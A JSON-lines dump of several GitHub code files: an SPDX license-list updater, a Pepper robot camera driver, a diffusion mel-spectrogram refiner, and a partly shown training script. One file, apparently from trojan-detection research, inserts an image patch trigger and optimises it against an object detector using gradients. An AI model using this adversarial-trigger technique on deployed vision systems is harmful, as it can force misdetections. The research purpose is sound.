urlopen\n\n\nclass Updater:\n\n BASE_URL = \"https://raw.githubusercontent.com/spdx/license-list-data/master/json/\"\n\n def __init__(self, base_url=BASE_URL): # type: (str) -> None\n self._base_url = base_url\n\n def dump(self, file=None): # type: (Optional[str]) -> None\n if file is None:\n file = os.path.join(os.path.dirname(__file__), \"data\", \"licenses.json\")\n\n licenses_url = self._base_url + \"licenses.json\"\n\n with open(file, \"w\", encoding=\"utf-8\") as f:\n f.write(\n json.dumps(self.get_licenses(licenses_url), indent=2, sort_keys=True)\n )\n\n def get_licenses(self, url): # type: (str) -> Dict[str, Any]\n licenses = {}\n with urlopen(url) as r:\n data = json.loads(r.read().decode())\n\n for info in data[\"licenses\"]:\n licenses[info[\"licenseId\"]] = [\n info[\"name\"],\n info[\"isOsiApproved\"],\n info[\"isDeprecatedLicenseId\"],\n ]\n\n return licenses\n","repo_name":"conda/conda-lock","sub_path":"conda_lock/_vendor/poetry/core/spdx/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":385,"dataset":"github-code","pt":"82"} +{"seq_id":"44112497036","text":"import qi\nimport vision_definitions as qivis\nimport motion as qimotion\n\nimport numpy as np\nimport cv2\nfrom threading import RLock\nimport time\n\nfrom is_msgs.image_pb2 import Image, ColorSpaces, Resolution, \\\n ImageFormat, ImageFormats\nfrom is_msgs.camera_pb2 import CameraSetting, FrameTransformation\nfrom is_msgs.common_pb2 import DataType\nfrom is_wire.core import Logger\n\n\ndef assert_type(instance, _type, name):\n if not isinstance(instance, _type):\n raise TypeError(\"Object {} must be of type {}\".format(\n name, _type.DESCRIPTOR.full_name))\n\n\ndef 
check_status(ok, why=\"Operation Failed\"):\n if not ok or ok == -1:\n raise RuntimeError(why)\n\n\nkPepperTopCamera = qivis.kTopCamera\nkPepperBottomCamera = qivis.kBottomCamera\nkPepperDepthCamera = qivis.kDepthCamera\n\nparameters = {\n \"brightness\": {\n \"id\": qivis.kCameraBrightnessID,\n \"max\": 255,\n \"min\": 0,\n },\n \"exposure\": {\n \"id\": qivis.kCameraExposureID,\n \"max\": 65536,\n \"min\": 0,\n \"auto_id\": qivis.kCameraAutoExpositionID,\n },\n \"hue\": {\n \"id\": qivis.kCameraHueID,\n \"max\": 180,\n \"min\": -180,\n },\n \"saturation\": {\n \"id\": qivis.kCameraSaturationID,\n \"max\": 255,\n \"min\": 0,\n },\n \"gain\": {\n \"id\": qivis.kCameraGainID,\n \"max\": 1024,\n \"min\": 0,\n \"auto_id\": qivis.kCameraAutoGainID\n },\n \"focus\": {\n \"auto_id\": qivis.kCameraAutoFocusID\n }\n}\n\n\ndef resolution_is_to_naoqi(resolution):\n if resolution.width == 80 and resolution.height == 60:\n return qivis.kQQQVGA\n if resolution.width == 160 and resolution.height == 120:\n return qivis.kQQVGA\n if resolution.width == 320 and resolution.height == 240:\n return qivis.kQVGA\n if resolution.width == 640 and resolution.height == 480:\n return qivis.kVGA\n if resolution.width == 1280 and resolution.height == 960:\n return qivis.k4VGA\n raise RuntimeError(\n \"Invalid Resolution Value, expected (80,60) or (160,120)\"\n \" or (320,240) or (640,480) or (1280,960)\")\n\n\ndef color_space_is_to_naoqi(color_space):\n if color_space == ColorSpaces.Value(\"RGB\") or \\\n color_space == ColorSpaces.Value(\"GRAY\"):\n return qivis.kBGRColorSpace\n if color_space == ColorSpaces.Value(\"HSV\"):\n return qivis.kHSVColorSpace\n if color_space == ColorSpaces.Value(\"YCbCr\"):\n return qivis.kYYCbCrColorSpace\n raise RuntimeError(\"Invalid ColorSpace value\")\n\n\nclass PepperCameraDriver(object):\n lock = RLock()\n logger = Logger(\"PepperCameraDriver\")\n\n def __init__(self, robot_uri, camera_id, camera_frame_id, base_frame_id):\n self.qi_app = qi.Application(\n [\"is::PepperCameraDriver\", \"--qi-url=\" + robot_uri])\n self.qi_app.start()\n self.qi_session = self.qi_app.session\n\n self.video = self.qi_session.service(\"ALVideoDevice\")\n\n self.camera = None\n self.camera_id = camera_id\n\n self.fps = 10.0\n self.deadline = None\n self.resolution = Resolution(width=320, height=240)\n self.color_space = ColorSpaces.Value(\"GRAY\")\n image_format = ImageFormat()\n image_format.format = ImageFormats.Value(\"JPEG\")\n image_format.compression.value = 0.8\n self.set_image_format(image_format)\n\n self.motion = self.qi_session.service(\"ALMotion\")\n self.camera_frame_id = camera_frame_id\n self.base_frame_id = base_frame_id\n\n def __set_parameter(self, name, camera_setting):\n assert_type(camera_setting, CameraSetting, \"camera_setting\")\n with self.lock:\n param = parameters[name]\n if \"auto_id\" in param:\n value = camera_setting.automatic\n status = self.video.setCameraParameter(self.camera,\n param[\"auto_id\"], value)\n check_status(\n status,\n \"Failed to set camera parameter='{}' to automatic={}\".\n format(name, value))\n\n if \"id\" in param and not camera_setting.automatic:\n ratio = camera_setting.ratio\n value = (param[\"max\"] - param[\"min\"]) * ratio + param[\"min\"]\n status = self.video.setCameraParameter(self.camera,\n param[\"id\"], value)\n check_status(status)\n\n def __get_parameter(self, name):\n camera_setting = CameraSetting()\n with self.lock:\n parameter = parameters[name]\n if \"auto_id\" in parameter:\n camera_setting.automatic = 
self.video.getCameraParameter(\n self.camera, parameter[\"auto_id\"])\n\n if \"id\" in parameter:\n value = self.video.getCameraParameter(self.camera,\n parameter[\"id\"])\n camera_setting.ratio = (value - parameter[\"min\"]) / float(\n parameter[\"max\"] - parameter[\"min\"])\n return camera_setting\n\n # Sampling Settings\n def set_sampling_rate(self, value):\n assert_type(value, (int, float), \"value\")\n with self.lock:\n check_status(self.video.setFrameRate(self.camera, int(value)))\n self.fps = value\n\n def set_delay(self, value):\n pass\n\n def get_sampling_rate(self):\n with self.lock:\n value = self.video.getFrameRate(self.camera)\n check_status(value, \"Failed to retrieve frame rate\")\n self.fps = value\n return value\n\n def get_delay(self):\n return None\n\n # Image Settings\n def set_resolution(self, resolution):\n assert_type(resolution, Resolution, \"resolution\")\n with self.lock:\n check_status(\n self.video.setResolution(self.camera,\n resolution_is_to_naoqi(resolution)),\n \"Failed to change resolution\")\n self.resolution = resolution\n\n def set_image_format(self, image_format):\n assert_type(image_format, ImageFormat, \"image_format\")\n with self.lock:\n if image_format.format == ImageFormats.Value(\"JPEG\"):\n self.encode_format = \".jpeg\"\n elif image_format.format == ImageFormats.Value(\"PNG\"):\n self.encode_format = \".png\"\n elif image_format.format == ImageFormats.Value(\"WebP\"):\n self.encode_format = \".webp\"\n\n if image_format.HasField(\"compression\"):\n if self.encode_format == '.jpeg':\n self.encode_parameters = [\n cv2.IMWRITE_JPEG_QUALITY,\n int(image_format.compression.value * (100 - 0) + 0)\n ]\n elif self.encode_format == '.png':\n self.encode_parameters = [\n cv2.IMWRITE_PNG_COMPRESSION,\n int(image_format.compression.value * (9 - 0) + 0)\n ]\n elif self.encode_format == '.webp':\n self.encode_parameters = [\n cv2.IMWRITE_WEBP_QUALITY,\n int(image_format.compression.value * (100 - 1) + 1)\n ]\n\n def set_color_space(self, color_space):\n assert_type(color_space, int, \"color_space\")\n with self.lock:\n check_status(\n self.video.setColorSpace(self.camera,\n color_space_is_to_naoqi(color_space)),\n \"Failed to set color space\")\n self.color_space = color_space\n\n def set_region_of_interest(self, bounding_poly):\n pass\n\n def get_resolution(self):\n with self.lock:\n value = self.video.getResolution(self.camera)\n resolution = Resolution()\n if value == qivis.kQQQVGA:\n resolution.width = 80\n resolution.height = 60\n elif value == qivis.kQQVGA:\n resolution.width = 160\n resolution.height = 120\n elif value == qivis.kQVGA:\n resolution.width = 320\n resolution.height = 240\n elif value == qivis.kVGA:\n resolution.width = 640\n resolution.height = 480\n elif value == qivis.k4VGA:\n resolution.width = 1280\n resolution.height = 960\n elif value == qivis.k16VGA:\n resolution.width = 2560\n resolution.height = 1920\n self.resolution = resolution\n return resolution\n\n def get_image_format(self):\n image_format = ImageFormat()\n with self.lock:\n if self.encode_format == \".jpeg\":\n image_format.format = ImageFormats.Value(\"JPEG\")\n image_format.compression.value = self.encode_parameters[1] / 100.0\n elif self.encode_format == \".png\":\n image_format.format = ImageFormats.Value(\"PNG\")\n image_format.compression.value = self.encode_parameters[1] / 9.0\n elif self.encode_format == \".webp\":\n image_format.format = ImageFormats.Value(\"WebP\")\n image_format.compression.value = (\n self.encode_parameters[1] - 1) / 99.0\n return 
image_format\n\n def get_color_space(self):\n with self.lock:\n return self.color_space\n\n def get_region_of_interest(self):\n return None\n\n # Camera Settings\n def set_brightness(self, camera_setting):\n self.__set_parameter(\"brightness\", camera_setting)\n\n def set_exposure(self, camera_setting):\n self.__set_parameter(\"exposure\", camera_setting)\n\n def set_focus(self, camera_setting):\n self.__set_parameter(\"focus\", camera_setting)\n\n def set_sharpness(self, camera_setting):\n pass\n\n def set_hue(self, camera_setting):\n self.__set_parameter(\"hue\", camera_setting)\n\n def set_saturation(self, camera_setting):\n self.__set_parameter(\"saturation\", camera_setting)\n\n def set_gamma(self, camera_setting):\n pass\n\n def set_shutter(self, camera_setting):\n pass\n\n def set_gain(self, camera_setting):\n self.__set_parameter(\"gain\", camera_setting)\n\n def set_white_balance_bu(self, camera_setting):\n pass\n\n def set_white_balance_rv(self, camera_setting):\n pass\n\n def set_zoom(self, camera_setting):\n pass\n\n def set_iris(self, camera_setting):\n pass\n\n def get_brightness(self):\n return self.__get_parameter(\"brightness\")\n\n def get_exposure(self):\n return self.__get_parameter(\"exposure\")\n\n def get_focus(self):\n return self.__get_parameter(\"focus\")\n\n def get_sharpness(self):\n return None\n\n def get_hue(self):\n return self.__get_parameter(\"hue\")\n\n def get_saturation(self):\n return self.__get_parameter(\"saturation\")\n\n def get_gamma(self):\n return None\n\n def get_shutter(self):\n return None\n\n def get_gain(self):\n return self.__get_parameter(\"gain\")\n\n def get_white_balance_bu(self):\n return None\n\n def get_white_balance_rv(self):\n return None\n\n def get_zoom(self):\n return None\n\n def get_iris(self):\n return None\n\n def start_capture(self):\n with self.lock:\n resolution = resolution_is_to_naoqi(self.resolution)\n color_space = color_space_is_to_naoqi(self.color_space)\n name = \"is::PepperCameraDriver.{}\".format(self.camera_id)\n self.camera = self.video.subscribeCamera(name, self.camera_id,\n resolution, color_space,\n int(self.fps))\n self.deadline = time.time() + 1.0 / self.fps\n\n def stop_capture(self):\n with self.lock:\n self.video.unsubscribe(self.camera)\n\n def grab_image(self):\n with self.lock:\n diff = self.deadline - time.time()\n\n if diff > 0:\n time.sleep(diff)\n\n with self.lock:\n if diff < 0:\n self.deadline = time.time()\n\n before_get = time.time()\n frame = self.video.getImageRemote(self.camera)\n\n proc_begin = time.time()\n\n width, height, buffer = frame[0], frame[1], frame[6]\n mat = np.frombuffer(\n buffer, dtype=np.uint8).reshape(height, width, -1)\n if self.color_space == ColorSpaces.Value(\"GRAY\"):\n mat = cv2.cvtColor(mat, cv2.COLOR_BGR2GRAY)\n image = cv2.imencode(\n ext=self.encode_format, img=mat, params=self.encode_parameters)\n\n proc_end = time.time()\n\n self.logger.debug(\n \"[GrabImage] New Frame (get={:.1f}ms, proc={:.1f}ms, next_in={:.1f}ms)\",\n (proc_begin - before_get) * 1000,\n (proc_end - proc_begin) * 1000, diff * 1000)\n self.deadline += 1.0 / self.fps\n\n return Image(data=image[1].tobytes())\n\n def get_pose(self):\n tf = FrameTransformation()\n with self.lock:\n setattr(tf, \"from\", self.camera_frame_id)\n setattr(tf, \"to\", self.base_frame_id)\n if self.camera_id == kPepperTopCamera:\n effector = \"CameraTop\"\n elif self.camera_id == kPepperBottomCamera:\n effector = \"CameraBottom\"\n elif self.camera_id == kPepperDepthCamera:\n effector = \"CameraDepth\"\n\n 
use_sensors = True\n rows = tf.tf.shape.dims.add()\n rows.size = 4\n rows.name = \"rows\"\n\n cols = tf.tf.shape.dims.add()\n cols.size = 4\n cols.name = \"cols\"\n\n tf.tf.type = DataType.Value(\"DOUBLE_TYPE\")\n Tcam_to_base = np.matrix(\n self.motion.getTransform(effector, qimotion.FRAME_ROBOT,\n use_sensors)).reshape(4, 4)\n Rz = np.matrix([[np.cos(-np.pi/2), -np.sin(-np.pi/2), 0, 0], \\\n [np.sin(-np.pi/2), np.cos(-np.pi/2), 0, 0], \\\n [0, 0, 1, 0], \\\n [0, 0, 0, 1]])\n\n Rx = np.matrix([[1, 0, 0, 0], \\\n [0, np.cos(-np.pi/2), -np.sin(-np.pi/2), 0], \\\n [0, np.sin(-np.pi/2), np.cos(-np.pi/2), 0], \\\n [0, 0, 0, 1]])\n\n # Fix frame orientation so that the z axis is aligned with the camera\n T = Tcam_to_base * Rz * Rx\n tf.tf.doubles.extend(T.reshape(1, -1).tolist()[0])\n\n return tf\n","repo_name":"labviros/is-pepper-gateways","sub_path":"camera-gateway/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":14842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"70370245388","text":"import random\nimport torch\n\nfrom model.base import BaseModule\nfrom model.diffusion import Diffusion\nfrom model.utils import sequence_mask, fix_len_compatibility\n\n\nclass DiffRefiner(BaseModule):\n def __init__(self, n_feats, use_text, dec_dim, beta_min, beta_max, pe_scale):\n super(DiffRefiner, self).__init__()\n self.n_feats = n_feats\n self.use_text = use_text\n self.dec_dim = dec_dim\n self.beta_min = beta_min\n self.beta_max = beta_max\n self.pe_scale = pe_scale\n\n self.decoder = Diffusion(dec_dim, n_feats, use_text, beta_min, beta_max, pe_scale)\n\n @torch.no_grad()\n def forward(self, y, y_lengths, n_timesteps, temperature=1.0, stoc=False, mu=None):\n \"\"\"\n Enhance mel-spectrograms.\n \n Args:\n y (torch.Tensor): batch of mel-spectrograms, padded.\n y_lengths (torch.Tensor): length of mel-spectrograms in batch.\n n_timesteps (int): number of steps to use for reverse diffusion in decoder.\n temperature (float, optional): controls variance of terminal distribution.\n stoc (bool, optional): deprecated argument when using the dpm solver.\n mu (torch.Tensor): average mel-spectrogram corresponding to the text. only used for DMSEtext.\n \"\"\"\n y, y_lengths = self.relocate_input([y, y_lengths])\n\n y_max_length = int(y_lengths.max())\n y_max_length_ = fix_len_compatibility(y_max_length)\n\n # Using obtained durations `w` construct alignment map `attn`\n y_mask = sequence_mask(y_lengths, y_max_length_).unsqueeze(1).to(y.dtype)\n if y_max_length < y_max_length_:\n y = torch.cat((y, y.new(y.shape[0], y.shape[1], y_max_length_-y_max_length).zero_()), dim=2)\n if not isinstance(mu, type(None)):\n mu = torch.cat(\n (mu, mu.new(mu.shape[0], mu.shape[1], y_max_length_-y_max_length).zero_()), dim=2)\n\n # Sample latent representation from terminal distribution N(mu_y, I)\n z = torch.randn_like(y, device=y.device) / temperature\n # Generate sample by performing reverse dynamics\n decoder_outputs = self.decoder(z, y_mask, y, n_timesteps, stoc, mu)\n decoder_outputs = decoder_outputs[:, :, :y_max_length]\n\n return decoder_outputs\n\n\n def compute_loss(self, x, y, y_lengths, mu=None, out_size=None):\n \"\"\"\n Compute the diffusion loss\n \n Args:\n x (torch.Tensor): batch of clean mel-spectrograms.\n y (torch.Tensor): batch of the corresponding degraded mel-spectrograms.\n y_lengths (torch.Tensor): length of mel-spectrograms in batch.\n mu (torch.Tensor): average mel-spectrogram corresponding to the text. 
only used for DMSEtext.\n out_size (int, optional): length (in mel's sampling rate) of segment to cut, on which decoder will be trained.\n Should be divisible by 2^{num of UNet downsamplings}. Needed to increase batch size.\n \"\"\"\n x, y, y_lengths = self.relocate_input([x, y, y_lengths])\n\n y_max_length = y.shape[-1]\n\n y_mask = sequence_mask(y_lengths, y_max_length).unsqueeze(1).to(y)\n\n # Cut a small segment of mel-spectrogram in order to increase batch size\n if not isinstance(out_size, type(None)):\n max_offset = (y_lengths - out_size).clamp(0)\n offset_ranges = list(zip([0] * max_offset.shape[0], max_offset.cpu().numpy()))\n out_offset = torch.LongTensor([\n torch.tensor(random.choice(range(start, end)) if end > start else 0)\n for start, end in offset_ranges\n ]).to(y_lengths)\n \n y_cut = torch.zeros(\n y.shape[0], self.n_feats, out_size, dtype=y.dtype, device=y.device)\n x_cut = torch.zeros(\n x.shape[0], self.n_feats, out_size, dtype=x.dtype, device=x.device)\n if not isinstance(mu, type(None)):\n mu_cut = torch.zeros(\n mu.shape[0], self.n_feats, out_size, dtype=mu.dtype, device=mu.device)\n else:\n mu_cut = None\n\n y_cut_lengths = []\n for i, (y_, x_, out_offset_) in enumerate(zip(y, x, out_offset)):\n y_cut_length = out_size + (y_lengths[i] - out_size).clamp(None, 0)\n y_cut_lengths.append(y_cut_length)\n cut_lower, cut_upper = out_offset_, out_offset_ + y_cut_length\n y_cut[i, :, :y_cut_length] = y_[:, cut_lower:cut_upper]\n x_cut[i, :, :y_cut_length] = x_[:, cut_lower:cut_upper]\n if not isinstance(mu, type(None)):\n mu_cut[i, :, :y_cut_length] = mu[i, :, cut_lower:cut_upper]\n y_cut_lengths = torch.LongTensor(y_cut_lengths)\n y_cut_mask = sequence_mask(y_cut_lengths, max_length=out_size).unsqueeze(1).to(y_mask)\n \n y = y_cut\n x = x_cut\n mu = mu_cut\n y_mask = y_cut_mask\n\n # Compute loss of score-based decoder\n diff_loss, _ = self.decoder.compute_loss(x, y_mask, y, mu)\n\n return diff_loss","repo_name":"dmse4tts/DMSE4TTS","sub_path":"model/refiner.py","file_name":"refiner.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"82"} +{"seq_id":"163468028","text":"import os\nimport numpy as np\nimport torch\nimport cv2\nimport torchvision\nimport json\nimport load_dataset\n# import PIL.Image\nimport polygon_trigger\n\n\nFILEPATH = '/scratch/jialin/round-10/projects/object_detection/models/id-00000009' \nTRIAL_OUTPUT = '/scratch/jialin/round-10/projects/object_detection/test_output/toy_clean/unconstrained'\nTOY_OUTPUT = '/scratch/jialin/round-10/projects/object_detection/test_output/toy_clean'\n\ndef prepare_boxes(anns, image_id):\n if len(anns) > 0:\n boxes = []\n class_ids = []\n for answer in anns:\n boxes.append(answer['bbox'])\n class_ids.append(answer['category_id'])\n\n class_ids = np.stack(class_ids)\n boxes = np.stack(boxes)\n # convert [x,y,w,h] to [x1, y1, x2, y2]\n boxes[:, 2] = boxes[:, 0] + boxes[:, 2]\n boxes[:, 3] = boxes[:, 1] + boxes[:, 3]\n else:\n class_ids = np.zeros((0))\n boxes = np.zeros((0, 4))\n\n degenerate_boxes = (boxes[:, 2:] - boxes[:, :2]) < 8\n degenerate_boxes = np.sum(degenerate_boxes, axis=1)\n if degenerate_boxes.any():\n boxes = boxes[degenerate_boxes == 0, :]\n class_ids = class_ids[degenerate_boxes == 0]\n target = {}\n target['boxes'] = torch.as_tensor(boxes)\n target['labels'] = torch.as_tensor(class_ids).type(torch.int64)\n target['image_id'] = torch.as_tensor(image_id)\n return target\n\n\ndef get_class_id_to_name_dict():\n '''\n returns 
{coco_category_id [int] : coco_category_name [str]}\n '''\n cat_txt = open('/scratch/jialin/round-10/projects/object_detection/cat_label/coco-labels-paper.txt', 'r')\n data = cat_txt.read()\n cat_lst = data.split('\\n')\n cat_txt.close()\n cat_dict = {str(k+1) : v for k, v in enumerate(cat_lst)}\n return cat_dict\n\ndef get_output_from_example_images(model, EXAMPLE_PATH, device):\n images_filepaths = [os.path.join(EXAMPLE_PATH, img) for img in os.listdir(EXAMPLE_PATH) if img.endswith('.jpg')]\n images_filepaths.sort()\n\n target = {}\n images, targets, ids = [], [], []\n for img_filepath in images_filepaths:\n image_id = os.path.basename(img_filepath)\n image_id = int(image_id.replace('.jpg',''))\n img = cv2.imread(img_filepath, cv2.IMREAD_UNCHANGED)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n with open(img_filepath.replace('.jpg', '.json')) as json_file:\n annotations = json.load(json_file)\n\n target = prepare_boxes(annotations, image_id)\n\n # with torch.no_grad():\n img = torch.as_tensor(img).permute((2, 0, 1))\n img = torchvision.transforms.functional.convert_image_dtype(img, torch.float)\n\n images.append(img)\n targets.append(target)\n ids.append(image_id)\n \n # with torch.no_grad():\n images = list(image.to(device) for image in images)\n images = [img.requires_grad_() for img in images]\n targets = [{k: v.to(device) for k, v in t.items()} for t in targets]\n \n outputs = model(images, targets)\n\n return {'image_id': ids, 'outputs': outputs, 'images': images}\n\n\ndef get_output_images(OUTPUT_DIR, EXAMPLE_PATH, example_outputs, number_of_detection=3):\n ids = example_outputs['image_id']\n outputs = example_outputs['outputs']\n if isinstance(outputs, tuple):\n outputs = outputs[1]\n\n example_images = [os.path.join(EXAMPLE_PATH, img) for img in os.listdir(EXAMPLE_PATH) if img.endswith('.jpg')]\n example_images.sort()\n\n for ind, out in enumerate(outputs):\n img = cv2.imread(example_images[ind], cv2.IMREAD_UNCHANGED)\n for i in range(number_of_detection):\n x1, y1, x2, y2 = out['boxes'][i]\n label = out['labels'][i]\n cat_name = cat_dict[str(label.item())]\n img = cv2.rectangle(img, (int(x1.item()), int(y1.item())), (int(x2.item()), int(y2.item())), (255, 0, 0), 2)\n img = cv2.putText(img, cat_name, (int(x1.item()), int(y1.item()) + 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 2)\n cv2.imwrite(OUTPUT_DIR+'/'+str(ids[ind])+'.jpg', img)\n\n\ndef save_images_with_gradient(OUTPUT_DIR, example_outputs):\n ids = example_outputs['image_id']\n outputs = example_outputs['outputs']\n images = example_outputs['images']\n outputs[0]['classification'].backward()\n for ind, img in enumerate(images):\n grad_img = img.grad.cpu().permute(1, 2, 0).numpy()\n grad_img -= grad_img.min()\n grad_img /= grad_img.max()\n grad_img *= 255\n grad_img = grad_img.astype(int)\n\n cv2.imwrite(OUTPUT_DIR+'/'+str(ids[ind])+'.jpg', grad_img)\n\n\ndef process_image(output_data_from_model):\n img = output_data_from_model.cpu().detach().permute(1, 2, 0).numpy()\n img -= img.min()\n img /= img.max()\n img *= 255\n img = img.astype(int)\n return img\n\n\ndef process_image_without_normalize(output_data_from_model):\n img = output_data_from_model.cpu().detach().permute(1, 2, 0).numpy()\n # img -= img.min()\n # img /= img.max()\n # img *= 255\n img = img.astype(int)\n return img\n\n\ndef save_grad_and_output_images(img_output, grad_output, ind):\n if grad_output is not None:\n # grad_image = process_image(grad_output)\n grad_output_filepath = os.path.join(TRIAL_OUTPUT, 'grad')\n 
cv2.imwrite(grad_output_filepath+'/'+str(ind)+'.jpg', np.asarray(torchvision.transforms.ToPILImage()(grad_output.cpu())))\n # cv2.imwrite(grad_output_filepath+'/'+str(ind)+'.jpg', grad_image)\n # image = process_image(img_output)\n img_output_filepath = os.path.join(TRIAL_OUTPUT, 'image_output')\n cv2.imwrite(img_output_filepath+'/'+str(ind)+'.jpg', np.asarray(torchvision.transforms.ToPILImage()(img_output.cpu())))\n # cv2.imwrite(img_output_filepath+'/'+str(ind)+'.jpg', image)\n\n\ndef insert_trigger(image, trigger):\n tri_w, tri_h = trigger.shape[1], trigger.shape[2]\n tri_img = image[:,10:10+tri_w, 10:10+tri_h]\n tri_mask = trigger != 0\n tri_img[tri_mask] = trigger[tri_mask]\n image[:,10:10+tri_w, 10:10+tri_h] = tri_img\n return image\n\n\ncat_dict = get_class_id_to_name_dict()\n\nPATH_WITH_ID = FILEPATH\nMODEL_PATH = os.path.join(PATH_WITH_ID, 'model.pt')\nTRIGGER_PATH = os.path.join(PATH_WITH_ID, 'trigger_0.png')\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n# load coco dataset - load a list of tuples [(tensor of image, annotations)]\nclean_images = load_dataset.filter_by_id([17], 30)\ntrigger = np.zeros(shape=(50, 50, 3))\n# trigger = cv2.imread(TRIGGER_PATH, cv2.IMREAD_UNCHANGED)\n# trigger = cv2.cvtColor(trigger, cv2.COLOR_BGR2RGB)\n# trigger = cv2.resize(trigger, (50, 50))\n\ntrigger = torch.as_tensor(trigger).permute((2, 0, 1))\ntrigger = torchvision.transforms.functional.convert_image_dtype(trigger, torch.float)\ncv2.imwrite(TRIAL_OUTPUT+'/'+'trigger_0.jpg', np.asarray(torchvision.transforms.ToPILImage()(trigger)))\n\n\n# load image and target\nimages, targets = [], []\n# ind = 1\nfor img, tgt in clean_images:\n img = insert_trigger(img, trigger)\n img = img.to(device)\n img = img.requires_grad_()\n images.append(img)\n tgt = prepare_boxes(tgt, tgt[0]['image_id'])\n tgt = {k:v.to(device) for k, v in tgt.items()}\n targets.append(tgt)\n # ind += 1\n\n# load model\ntest_model = torch.load(MODEL_PATH)\ntest_model.to(device)\ntest_model.eval()\n\n\ntotal_steps, EPSILON = 25, 20\nLOSS, DELTA_NORM = [], []\noutputs = []\n\nimg, tgt = images[-1], targets[-1]\n\nfor step in range(1, total_steps+1):\n img = img.to(device).requires_grad_()\n if torch.all(img >= 0.) 
and torch.all(img <= 1.):\n img.retain_grad()\n output = test_model([img], [tgt])\n print('step: ', step, 'loss: ', output[0]['classification'].item())\n output[0]['classification'].backward()\n\n img_grad = img.grad\n save_grad_and_output_images(img, img_grad, step)\n\n trigger_grad = img_grad.cpu()\n updates = []\n for i in range(3):\n # updates.append(trigger[i] + torch.mean(trigger_grad[i]/torch.linalg.norm(torch.linalg.norm(trigger_grad[i], dim=1, ord=2), ord=2))*EPSILON*2.5/step)\n updates.append(trigger[i]+torch.mean(trigger_grad[i])*EPSILON*2.5/step)\n trigger = torch.stack(updates)\n\n test_model.zero_grad()\n img = img.detach().cpu()\n\n img = insert_trigger(img, trigger)\n img = img - img.min()\n img = img / img.max()\n cv2.imwrite(TRIAL_OUTPUT+'/'+'trigger_'+ str(step)+ '.jpg', np.asarray(torchvision.transforms.ToPILImage()(trigger)))\n # outputs.append({'scores': output[1][0]['scores'][:10], 'labels': output[1][0]['labels'][:10], 'boxes': output[1][0]['boxes'][:10]})\n else:\n break\n\n# print(outputs)\n# print('LOSS: ', LOSS)\n# print('DELTA_NORM: ', DELTA_NORM)","repo_name":"jsong2333333/round-10","sub_path":"projects/object_detection/src/toy_example_with_coco_clean.py","file_name":"toy_example_with_coco_clean.py","file_ext":"py","file_size_in_byte":8680,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"82"} +{"seq_id":"38069452471","text":"import os\nfrom shutil import copyfile\n\nfrom tqdm import tqdm\nfrom statistics import mean\nfrom fastprogress import master_bar, progress_bar\nimport torch\nimport wandb\nfrom adabelief_pytorch import AdaBelief\n\nfrom modules.single_tf import SingleNet\nfrom modules.oracle.oracle import Oracle\nfrom utils.utils import load_vocab, seed_everything\nfrom utils.dataloader import get_dataloader, get_test_loader\nfrom utils.consts import RICH_DIM, BASE_DIM\nfrom utils.scheduler import get_linear_schedule_with_warmup\n\n# logging\nfrom logging import getLogger\nlogger = getLogger(__name__)\n\n\ndef train_single_tf(args):\n \"\"\"\n Parameters\n ----------\n args : ArgumentParser\n \"\"\"\n seed_everything(args.seed)\n device = f'cuda:{args.gpu_id}' if torch.cuda.is_available() else 'cpu'\n logger.info(f'Detected device type: {device}')\n\n # Copy the yaml to the temporal directory\n dest = os.path.join(args.save_dir, os.path.basename(args.yaml_path))\n if args.yaml_path != dest:\n copyfile(args.yaml_path, dest)\n\n # wandb\n if not args.off_wandb:\n wandb.init(\n project='single_model',\n entity='aaai_2020',\n name=os.path.basename(args.save_dir),\n )\n wandb.config.update(args)\n wandb.save(dest)\n\n vocab = load_vocab(args.vocab_path)\n\n # Modeling\n spatial_dim = RICH_DIM if args.proposed_model_mode else BASE_DIM\n net = SingleNet(\n device,\n args.cropped_img_enc_dim + spatial_dim,\n vocab,\n args.ans_vocab_size,\n args.gen_seq_len,\n args.load_guesser,\n args.load_generator,\n args.proposed_q_gen_top_k,\n args.split_class_size,\n args.image_data_version,\n max_batch_size=args.batch_size,\n obj_memory_only=args.obj_memory_only,\n )\n\n # Data Loading\n train_loader, val_loader = get_dataloader(args, multi_q_ver=True)\n\n # ========================================================================\n # Configurations\n # ========================================================================\n # optimizer\n if args.enc_only:\n logger.info('Training only Encoder(=Guesser) Mode !')\n params = net.encoder.parameters()\n else:\n params = list(net.encoder.parameters()) + 
list(net.decoder.parameters())\n\n if args.adabelief:\n # ref: https://github.com/juntang-zhuang/Adabelief-Optimizer\n optimizer = AdaBelief(\n params,\n args.lr,\n eps=1e-16,\n betas=(0.9, 0.999),\n weight_decouple=True,\n rectify=False, # use SGD for warmup at first when True\n )\n else:\n optimizer = torch.optim.Adam(params, args.lr)\n\n # scheduler\n if args.num_warmup_epochs > 0:\n logger.info('LinearScheduleWarmup using!')\n data_size = len(train_loader.dataset)\n scheduler = get_linear_schedule_with_warmup(\n optimizer,\n args.num_warmup_epochs * (data_size // args.batch_size),\n args.epochs * (data_size // args.batch_size),\n )\n\n init_epoch = 1\n best_loss = 1e7\n early_stop_count = 0\n\n # TODO: load pre-trained model & info\n\n # Learning\n mb = master_bar(range(init_epoch, args.epochs + 1))\n for epoch in mb:\n train_so_losses = []\n train_prg_losses = []\n valid_so_losses = []\n valid_prg_losses = []\n\n # Training loop\n for data in progress_bar(train_loader, parent=mb):\n # TODO: track guesser loss & qgen loss separately\n train_so_loss, train_prg_loss = net.pretrain_net(\n data,\n is_train=True,\n enc_only=args.enc_only,\n proposed_model_mode=args.proposed_model_mode,\n idk_mode=args.idk_mode,\n )\n optimizer.zero_grad()\n if args.enc_only:\n train_so_loss.backward()\n else:\n (train_so_loss + train_prg_loss).backward()\n\n optimizer.step()\n if args.num_warmup_epochs > 0:\n # update scheduler\n scheduler.step()\n\n train_so_losses.append(train_so_loss.item())\n train_prg_losses.append(train_prg_loss.item())\n\n # Validation loop\n for data in progress_bar(val_loader, parent=mb):\n valid_so_loss, valid_prg_loss = net.pretrain_net(\n data,\n is_train=False,\n enc_only=args.enc_only,\n 